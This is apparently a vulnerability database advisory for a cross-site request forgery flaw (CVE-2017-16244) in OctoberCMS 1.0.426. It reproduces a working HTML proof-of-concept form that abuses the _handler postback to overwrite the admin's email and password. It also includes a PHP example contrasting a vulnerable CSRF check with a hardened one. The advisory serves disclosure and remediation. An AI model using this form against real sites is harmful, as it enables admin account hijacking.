OctoberCMS Cross-Site Request Forgery Vulnerability

Vulnerability ID 1124401 Vulnerability type Cross-Site Request Forgery
Published 2017-11-01 Updated 2020-08-04
CVE number CVE-2017-16244

CNNVD-ID CNNVD-201711-010
Platform PHP CVSS score 6.8
Source
https://www.exploit-db.com/exploits/43106
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201711-010
Details
OctoberCMS is an open-source, self-hosted content management system (CMS) built on the Laravel PHP framework, developed jointly by Canadian software developer Alexey Bobkov and Australian software developer Samuel Georges.
A cross-site request forgery vulnerability exists in OctoberCMS 1.0.426 (aka Build 426). It stems from the program failing to correctly validate CSRF tokens when handling postbacks. A remote attacker can use a certain _handler postback variable to bypass the protection mechanism and take control of user accounts.
Exploit
# Exploit Title: OctoberCMS 1.0.426 - CSRF to Admin Account Takeover
# Vendor Homepage: https://octobercms.com
# Software Link: https://octobercms.com/download
# Exploit Author: Zain Sabahat
# Website: https://about.me/ZainSabahat
# Category: webapps
# CVE: CVE-2017-16244
1. Description
Cross-Site Request Forgery exists in OctoberCMS 1.0.426 (aka Build 426) due to improper validation of CSRF Tokens for postback handling, allowing an attacker to successfully take over the victim's account.
The vendor was using additional X-CSRF Headers and CSRF Token to prevent the CSRF from occurring. The researcher found a way to bypass this protection. After digging more in the Application he found a postback variable "_handler=" which could be used to perform CSRF without X-Headers. The CSRF Tokens were also not being validated when the _handler parameter was used to make the request.
In short, this attack bypasses a protection mechanism involving X-CSRF headers and CSRF tokens via a certain _handler postback variable.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16244
https://vuldb.com/?id.108857
2. Proof of Concept
Below is the CSRF Exploit (.html) which can lead to the takeover of the Admin's Account upon successful execution.
<html>
<body>
<form action="http://host/backend/users/myaccount" method="POST">
<input type="hidden" name="_handler" value="onSave" />
<input type="hidden" name="User[login]" value="Admin" />
<input type="hidden" name="User[email]" value="Hacked@hacked.com" />
<input type="hidden" name="User[first_name]" value="Admin" />
<input type="hidden" name="User[last_name]" value="1337" />
<input type="hidden" name="User[password]" value="YourNewPassword" />
<input type="hidden" name="User[password_confirmation]" value="YourNewPassword" />
<input type="hidden" name="redirect" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Upon execution of this CSRF, the Admin Account details will be replaced by ours, leading to complete hijacking of the Admin Account.
3. Reference
https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0
https://vuldb.com/?id.108857
4. Solution
The vulnerability will be patched by the vendor in the next release of OctoberCMS. The following changes should be made for a temporary fix (https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0).
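As an added illustration of the class of fix this advisory calls for (example code written for this page, not OctoberCMS's own code and not the contents of the referenced commit): a postback CSRF check that applies to every state-changing request, placed beside the weak pattern that only checks the token when the AJAX header is present and so lets a plain HTML form post carrying `_handler` through unchecked. The function names, the `$session`/`$headers`/`$post` arrays and the `_token` field name are assumptions made for the example.

```php
<?php
// Added example, not OctoberCMS code. verifyPostbackCsrfWeak(),
// verifyPostbackCsrf() and the request/session array shapes are assumptions.
declare(strict_types=1);

/**
 * Weak variant, modelled on the bug class described above: the token is only
 * compared when the request arrived through the AJAX path (X-CSRF-TOKEN header
 * set). A cross-origin HTML form cannot set that header, so its postback
 * reaches the `_handler` without any token check at all.
 */
function verifyPostbackCsrfWeak(array $session, array $headers, array $post): bool
{
    if (!isset($headers['X-CSRF-TOKEN'])) {
        return true; // non-AJAX postback: no comparison performed
    }
    $expected = (string) ($session['_token'] ?? '');
    return $expected !== '' && hash_equals($expected, (string) $headers['X-CSRF-TOKEN']);
}

/**
 * Hardened variant: every POST must present the session token, either as the
 * `_token` form field or the X-CSRF-TOKEN header. Requests naming a `_handler`
 * get no exemption, a missing session token is a refusal rather than a pass,
 * and the comparison is constant-time.
 */
function verifyPostbackCsrf(array $session, array $headers, array $post): bool
{
    $expected = $session['_token'] ?? null;
    if (!is_string($expected) || $expected === '') {
        return false;
    }
    $supplied = $post['_token'] ?? ($headers['X-CSRF-TOKEN'] ?? null);
    if (!is_string($supplied) || $supplied === '') {
        return false;
    }
    return hash_equals($expected, $supplied);
}

// Constructed sample data for a stand-alone run.
$session = ['_token' => bin2hex(random_bytes(20))];

// A cross-origin form submission: the browser attaches the session cookie, but
// the submitting page cannot read the token or add custom headers.
$forgedHeaders = [];
$forgedPost    = ['_handler' => 'onSave', 'User[email]' => 'someone@example.invalid'];

// A legitimate same-origin form that embedded the session token as a hidden field.
$legitPost = ['_handler' => 'onSave', '_token' => $session['_token']];

printf("weak check, forged postback:     %s\n", verifyPostbackCsrfWeak($session, $forgedHeaders, $forgedPost) ? 'accepted' : 'rejected');
printf("hardened check, forged postback: %s\n", verifyPostbackCsrf($session, $forgedHeaders, $forgedPost) ? 'accepted' : 'rejected');
printf("hardened check, legit postback:  %s\n", verifyPostbackCsrf($session, $forgedHeaders, $legitPost) ? 'accepted' : 'rejected');
```

The design point is that the guard keys on the request being state-changing, not on how it arrived: whether the client used the AJAX framework or a plain form, and whatever `_handler` it names, the handler runs only after the token bound to the session has been presented and matched. Run it with `php file.php`; the forged postback is accepted by the weak check and rejected by the hardened one, while the legitimate one passes.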
References

Source: CONFIRM
Link: https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0